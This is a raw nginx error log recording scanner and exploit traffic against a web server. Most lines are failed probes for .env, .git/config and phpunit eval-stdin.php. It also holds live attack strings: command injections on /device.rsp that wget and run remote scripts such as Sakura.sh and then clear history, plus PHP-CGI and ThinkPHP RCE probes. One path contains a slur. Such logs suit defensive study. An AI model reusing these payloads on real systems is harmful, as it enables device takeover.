2026/02/14 23:16:43 [error] 406#406: *452 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 213.209.159.181, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51" 2026/02/19 01:01:17 [error] 985#985: *104536 open() "/var/www/html/sse" failed (2: No such file or directory), client: 45.156.129.65, server: localhost-nginx-proxy-manager, request: "GET /sse HTTP/1.1", host: "222.117.41.51"
2026/02/14 23:26:45 [error] 444#444: *515 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 130.12.180.151, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20busybox%20rm%20bbc%3B%20wget%20http%3A%2F%2F130.12.180.151%3A8080%2Ffile%2Fbbc%3B%20busybox%20sh%20bbc HTTP/1.1", host: "222.117.41.51:80" 2026/02/19 02:38:24 [error] 990#990: *107859 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 40.119.33.98, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "222.117.41.51"
2026/02/14 23:37:17 [error] 509#509: *766 open() "/var/www/html/login.asp" failed (2: No such file or directory), client: 195.3.221.86, server: localhost-nginx-proxy-manager, request: "GET /login.asp HTTP/1.1", host: "222.117.41.51:80" 2026/02/19 03:16:18 [error] 992#992: *108082 open() "/var/www/html/login" failed (2: No such file or directory), client: 104.164.8.29, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 02:44:08 [error] 519#519: *4174 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" 2026/02/19 03:25:01 [error] 992#992: *108112 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 03:02:53 [error] 526#526: *5699 open() "/var/www/html/HNAP1" failed (2: No such file or directory), client: 139.59.181.152, server: localhost-nginx-proxy-manager, request: "GET /HNAP1 HTTP/1.1", host: "222.117.41.51:80", referrer: "http://222.117.41.51:80/" 2026/02/19 03:43:40 [error] 992#992: *108174 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 102.22.20.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "222.117.41.51"
2026/02/15 03:03:22 [error] 526#526: *5700 open() "/var/www/html/onvif/device_service" failed (2: No such file or directory), client: 139.59.181.152, server: localhost-nginx-proxy-manager, request: "POST /onvif/device_service HTTP/1.1", host: "222.117.41.51:80", referrer: "http://222.117.41.51:80/" 2026/02/19 03:49:45 [error] 985#985: *108253 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 195.178.110.18, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51"
2026/02/15 03:03:23 [error] 526#526: *5701 open() "/var/www/html/PSIA/index" failed (2: No such file or directory), client: 139.59.181.152, server: localhost-nginx-proxy-manager, request: "GET /PSIA/index HTTP/1.1", host: "222.117.41.51:80", referrer: "http://222.117.41.51:80/"
2026/02/15 04:00:23 [error] 519#519: *5894 open() "/var/www/html/odinhttpcall1771128023" failed (2: No such file or directory), client: 64.226.70.144, server: localhost-nginx-proxy-manager, request: "GET /odinhttpcall1771128023 HTTP/1.1", host: "222.117.41.51"
2026/02/15 04:00:23 [error] 519#519: *5896 open() "/var/www/html/sdk" failed (2: No such file or directory), client: 64.226.70.144, server: localhost-nginx-proxy-manager, request: "POST /sdk HTTP/1.1", host: "222.117.41.51"
2026/02/15 04:00:24 [error] 520#520: *5897 open() "/var/www/html/evox/about" failed (2: No such file or directory), client: 64.226.70.144, server: localhost-nginx-proxy-manager, request: "GET /evox/about HTTP/1.1", host: "222.117.41.51"
2026/02/15 04:00:24 [error] 521#521: *5898 open() "/var/www/html/HNAP1" failed (2: No such file or directory), client: 64.226.70.144, server: localhost-nginx-proxy-manager, request: "GET /HNAP1 HTTP/1.1", host: "222.117.41.51"
2026/02/15 04:00:26 [error] 520#520: *5901 open() "/var/www/html/cgi-bin/authLogin.cgi" failed (2: No such file or directory), client: 209.38.212.21, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/authLogin.cgi HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 04:00:26 [error] 520#520: *5902 open() "/var/www/html/query" failed (2: No such file or directory), client: 104.248.19.198, server: localhost-nginx-proxy-manager, request: "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 04:00:26 [error] 520#520: *5903 open() "/var/www/html/v2/_catalog" failed (2: No such file or directory), client: 209.38.212.21, server: localhost-nginx-proxy-manager, request: "GET /v2/_catalog HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 04:00:26 [error] 520#520: *5906 open() "/var/www/html/solr/admin/info/system" failed (2: No such file or directory), client: 46.101.143.239, server: localhost-nginx-proxy-manager, request: "GET /solr/admin/info/system HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 04:00:26 [error] 520#520: *5909 open() "/var/www/html/solr/admin/cores" failed (2: No such file or directory), client: 46.101.143.239, server: localhost-nginx-proxy-manager, request: "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 04:12:12 [error] 519#519: *7411 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 104.192.2.62, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51"
2026/02/15 04:21:38 [error] 519#519: *7416 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 47.121.210.129, server: localhost-nginx-proxy-manager, request: "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.43%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+rm+-rf+%2A.sh%3B+history+-c HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 04:47:43 [error] 519#519: *7553 open() "/var/www/html/SDK/duckyisafaggot" failed (2: No such file or directory), client: 195.178.110.241, server: localhost-nginx-proxy-manager, request: "GET /SDK/duckyisafaggot HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:31 [error] 520#520: *7666 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:32 [error] 520#520: *7666 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:32 [error] 520#520: *7666 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:32 [error] 520#520: *7666 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:33 [error] 520#520: *7666 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:33 [error] 520#520: *7666 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:33 [error] 520#520: *7666 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:34 [error] 520#520: *7666 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:34 [error] 520#520: *7666 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:34 [error] 520#520: *7666 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:35 [error] 520#520: *7666 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:35 [error] 520#520: *7666 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:35 [error] 520#520: *7666 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:36 [error] 520#520: *7666 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:36 [error] 520#520: *7666 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:36 [error] 520#520: *7666 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:37 [error] 520#520: *7666 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:37 [error] 520#520: *7666 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:37 [error] 520#520: *7666 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:38 [error] 520#520: *7666 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:38 [error] 520#520: *7666 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:38 [error] 520#520: *7666 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:39 [error] 520#520: *7666 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:39 [error] 520#520: *7666 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:39 [error] 520#520: *7666 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:40 [error] 520#520: *7666 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:40 [error] 520#520: *7666 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:40 [error] 520#520: *7666 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:41 [error] 520#520: *7666 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:41 [error] 520#520: *7666 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:42 [error] 520#520: *7666 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:42 [error] 520#520: *7666 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:42 [error] 520#520: *7666 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:43 [error] 520#520: *7666 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:43 [error] 520#520: *7666 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:43 [error] 520#520: *7666 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:44 [error] 520#520: *7666 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:44 [error] 520#520: *7666 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:44 [error] 520#520: *7666 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:45 [error] 520#520: *7666 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 05:43:46 [error] 520#520: *7666 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 06:37:11 [error] 576#576: *10961 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 199.45.155.90, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "222.117.41.51"
2026/02/15 06:43:29 [error] 673#673: *11142 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 06:43:30 [error] 678#678: *11144 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 07:34:35 [error] 818#818: *11786 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.80.105.83, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "222.117.41.51"
2026/02/15 08:12:29 [error] 816#816: *12542 "/var/www/html/cgi-bin/luci/index.html" is not found (2: No such file or directory), client: 87.120.191.81, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/ HTTP/1.1", host: "222.117.41.51"
2026/02/15 10:39:21 [error] 819#819: *14815 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:22 [error] 819#819: *14815 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:22 [error] 819#819: *14815 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:22 [error] 819#819: *14815 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:22 [error] 819#819: *14815 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:22 [error] 819#819: *14815 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:22 [error] 819#819: *14815 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:25 [error] 819#819: *14815 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:25 [error] 819#819: *14815 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:25 [error] 819#819: *14815 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:25 [error] 819#819: *14815 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/15 10:39:25 [error] 819#819: *14815 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
